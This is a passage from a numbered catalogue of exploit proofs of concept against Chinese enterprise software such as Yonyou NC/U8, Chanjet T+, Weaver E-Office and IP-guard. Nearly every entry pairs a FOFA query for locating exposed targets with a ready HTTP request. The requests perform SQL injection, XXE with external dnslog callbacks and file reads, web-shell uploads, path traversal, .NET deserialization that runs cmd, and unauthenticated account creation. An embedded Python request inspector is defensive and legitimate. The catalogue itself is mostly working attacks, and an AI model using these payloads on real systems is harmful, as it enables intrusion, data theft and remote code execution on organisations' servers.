GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Then access:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
(Note the trailing space after .php in the filename below; it is part of the POC.)

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Then access:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 (Yunshikong) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
(Note: the only POC given for this entry is a directory-traversal read of /etc/passwd, not an upload request.)

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
    "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
      "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "FileName":"cmd",
      "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
}
}

Step 2: access the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

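The `${jndi:...}` body at the top of this section and #25 (JNDI lookups), #23 (a fastjson autotype probe), #36, #37, #38, #40 and #45 (XXE through SOAP, RPC and form fields) and #54 and #56 (AjaxPro `__type` hints that reach System.Diagnostics.Process) are all request bodies a reverse proxy or WAF can inspect without knowing anything about the product behind it. The function below is an added example of that inspection, not code from the article or from any vendor: it flags `${jndi:` lookups, `<!DOCTYPE` and `<!ENTITY ... SYSTEM` declarations (including parameter entities and entity references percent-encoded as `%26name%3b`, as in #36 and #38), and JSON type hints (`@type`, `__type`, `$type`) whose class names are known gadget entry points. One caveat the fastjson probe in #23 makes visible: it is not valid JSON (an object literal sits where a key should be); fastjson's parser accepts it but a strict parser does not, so the type-hint search runs on the raw text and the strict-parse failure is itself reported. The probe bodies are copied from the entries above; the indicator names are this example's own.

```python
"""Added example: inspect one HTTP request body for the deserialization
and XXE indicators shown in the entries above (stdlib only)."""
from __future__ import annotations

import json
import re
from urllib.parse import unquote_plus

# ${jndi:ldap://...} lookups anywhere in the body
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any DOCTYPE at all: a securely configured parser never needs one from a client
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# External general entity, parameter entity (<!ENTITY % a SYSTEM ...) or an
# external DTD subset (<!DOCTYPE foo SYSTEM "http://...">)
_EXTERNAL = re.compile(
    r"<!(?:ENTITY\s+%?\s*\w+|DOCTYPE\s+\w+)\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Type hints honoured by fastjson (@type), AjaxPro (__type) and Json.NET ($type)
_TYPE_HINT = re.compile(r'"(?:@type|__type|\$type)"\s*:\s*"([^"]+)"')

# Class names that have no business in client-supplied JSON.
GADGET_PREFIXES = (
    "com.alibaba.fastjson.JSONObject",          # nested-autotype wrapper (#23)
    "java.net.URL",                             # DNS callback probe (#23)
    "com.sun.rowset.JdbcRowSetImpl",            # classic fastjson JNDI gadget
    "System.Windows.Data.ObjectDataProvider",   # .NET: invokes any method (#54, #56)
    "System.Diagnostics.Process",
)


def inspect_body(content_type: str, body: str) -> list[str]:
    """Return the sorted indicator names found in one request body."""
    hits: set[str] = set()
    # Form fields carry the XML percent-encoded (#36, #38, #45), so scan
    # both the raw body and a decoded copy.
    for text in (body, unquote_plus(body)):
        if _JNDI.search(text):
            hits.add("jndi-lookup")
        if _DOCTYPE.search(text):
            hits.add("xml-doctype")
        if _EXTERNAL.search(text):
            hits.add("xml-external-entity")

    looks_like_json = "json" in content_type.lower() or body.lstrip().startswith("{")
    if looks_like_json:
        try:
            json.loads(body)
        except ValueError:
            # Tolerant parsers (fastjson) accept what strict ones reject.
            hits.add("json-malformed")
        hints = _TYPE_HINT.findall(body)          # works on malformed JSON too
        if hints:
            hits.add("json-type-hint")
        if any(h.startswith(p) for h in hints for p in GADGET_PREFIXES):
            hits.add("json-gadget-type")
    return sorted(hits)


# Probe bodies copied from the entries above.
JNDI_PROBE = '{"loginName":"${jndi:ldap://dnslog}"}'
FASTJSON_PROBE = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                  '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}')
AJAXPRO_PROBE = (
    '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, '
    'PresentationFramework, Version=4.0.0.0, Culture=neutral, '
    'PublicKeyToken=31bf3856ad364e35","MethodName":"Start","ObjectInstance":{'
    '"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
    'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{'
    '"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, '
    'Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"FileName":"cmd","Arguments":"/c ping 6qevyvmi.dnslog.pw"}}}}')
XXE_FORM_PROBE = (
    "__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel"
    '&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]>'
    '<rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">'
    "%26Password;</p></vps></rpc>")
XXE_DTD_PROBE = ('reqData=<?xml version="1.0"?>\n'
                 '<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1')

if __name__ == "__main__":
    for name, ct, body in [
        ("jndi", "application/json", JNDI_PROBE),
        ("fastjson", "application/json", FASTJSON_PROBE),
        ("ajaxpro", "application/json", AJAXPRO_PROBE),
        ("xxe-form", "application/x-www-form-urlencoded", XXE_FORM_PROBE),
        ("xxe-dtd", "application/x-www-form-urlencoded", XXE_DTD_PROBE),
    ]:
        print(f"{name:9} {inspect_body(ct, body)}")
```

The DOCTYPE rule is deliberately blunt: the fix on the server side for every XXE entry above is to disallow DOCTYPE declarations entirely, so seeing one from a client is worth an alert on its own, and the `json-malformed` flag is what catches the #23 shape when the type-hint regex is evaded by spacing or escaping.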
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform (百卓Smart管理平台) importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, so the endpoint executes caller-supplied SQL and returns the result as a spreadsheet export.

61. 浙大恩特 customer resource management system (Entsoft) fileupload.jsp arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system (捷诚管理信息系统, EnjoyRMIS) CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based probe: compare against a baseline request with a benign sId; a response delayed by roughly five seconds indicates the injection.

65. 优卡特脸爱云一脸通智慧管理平台 (Youkate face-recognition smart management platform) 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the operator account test123456 / 123456 was created without any authentication. This check writes to the target, so delete the test operator afterwards.
POST /SystemMng.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform (万户ezOFFICE协同管理平台) SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

